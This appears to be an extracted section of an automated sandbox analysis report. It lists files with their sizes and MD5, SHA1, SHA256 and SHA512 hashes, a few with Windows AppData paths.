SHA1 ceb8fd30d3ea2b2d4812ce9c9ff389cf1deb73de
SHA256 ac60dc403a25d903a545ba31e226c47dd865996e3ab22181c4ed4519f44dc04d
SHA512 4e8da943220b81be6a8c7e6413e2d9b5f5ba90d731e0eafa206f93500507be837601c04d03c743b764e14fd173b4ff68973c805b84b5c76a36fcdb985189343c

Filesize 19KB
MD5 41c1930548d8b99ff1dbb64ba7fecb3d
SHA1 d8acfeaf7c74e2b289be37687f886f50c01d4f2f
SHA256 16cee17a989167242dd7ee2755721e357dd23bcfcb61f5789cc19deafe7ca502
SHA512 a684d61324c71ac15f3a907788ab2150f61e7e2b2bf13ca08c14e9822b22336d0d45d9ff2a2a145aa7321d28d6b71408f9515131f8a1bd9f4927b105e6471b75

Filesize 50KB
MD5 aae64bd086885570e11c68705fed4dd1
SHA1 de10a26444a0a00781deb45790e1cd56141f6135
SHA256 605009e9fe0ad54de7c5a1522c76a0f78a06ce1f36eb1cf37d0e5aefb41b8b2e
SHA512 2bcf14833bc2b1be1d432d62451c423d427976eb2d383c608ada9e43a82b1b4545284252e608ddf1c5087d9ee56690f8a19b794eae7941b4386a51c2fed7befc

Filesize 50KB
MD5 449f46ed956c025e0a33cc0e9e193228
SHA1 71380d288258b1cc0c555fcde625b10f5ae97451
SHA256 ca9308c4df021f73168a2e9ecad87ef10f1d740cae229d3322e7099b6b2a9bed
SHA512 f254a2a2dd715f640981663a435222fea83e4fc594792f2b5123b5d969629513fb02cbb36b5e68518317765517266cb09cf8e3285d51a3bc059370621cde7650

Filesize 41KB
MD5 278f18b5b850831ced5d5d3f1e7b734f
SHA1 1033b5514bb741a3d15bc6d4f47ec422fa7fbac3
SHA256 9fbeaed9fef719b269cccad31586db2f0b8201b3e3f9c682389ac1bd497a588a
SHA512 d7d7ccf9f70a1f0fc91974c507b311403e0f6c6080e41c4c15e9d8656f3ba401d1b855e40154b6cc6835bcb9fe74f338f8e481932a7e10f48ca8d151eb128393

Filesize 55KB
MD5 0d686aec04fac005cd2ff648d776534f
SHA1 e0adf54169c597f32545dadacf9bed2ffda2d3f9
SHA256 b79c36970f9873b4b7199478fd6527396732907bd3a1de11539154ca91157f50
SHA512 84ba80b82dada1fd83f117db5cd6f52cca9f21a1a36a549c19f347974b6fc2e8c1b8832e839b3d51ab38896b8269ef9a288a236b1ea2a0151701a4c514517d85

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\a8a00ad8-c9d9-4cce-b9ae-3d51e1db2cf4.down_data
Filesize 555KB
MD5 5683c0028832cae4ef93ca39c8ac5029
SHA1 248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256 855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512 aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize 23KB
MD5 be4306ed23e3366c80b84db4f2f21e3b
SHA1 e8ffe0e84930f28f44e86410450c7c303da78431
SHA256 0bd4f69043a6efec682af5d1145a22127ae2d97bd66cce63e35132f85fff2778
SHA512 a18bcad9ff46d69f79a6f49af210797b582bbb97b523b56b7b6a57cc37b34c5403bbfe259ec218a11853f557801ef61a260fb4dfad95f6453ef1a798c65b1fa6

Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize 627KB
MD5 feaff56d0d9b17f8f00ebed2482970d3
SHA1 3e23b591d688ad8ba7ead4e9fc9c46262eb842b6
SHA256 a79c39b5f74307dfbc6f9fbb16031342bfb6a9042ccc89a27be9808c684fafe5
SHA512 4b9872b19afa5b61355e3ded7d697efeb6f8644ba0619160c37ee8bfabc0c81f6a2fa5907889150cd2f39a70fb81d78a6665d2e13233f4b75e1e18599cd0b7c6

Filesize 154B
MD5 3ff9ce45b994c38b84895824d362b918
SHA1 52d52ecb89c0826a1e03febda221bf56476e7930
SHA256 2dfd18edf3f3b98c9737e68416d79e85349721b3d1e37b651b62fb789ce512b2
SHA512 6394e3680aa64f67b2249fde91b3107ba0beda24198ace240173ed4e9c543a12000bdd47d2ef4a664e6271010755d8361497c5094283ca1ef256f2bda64dabc7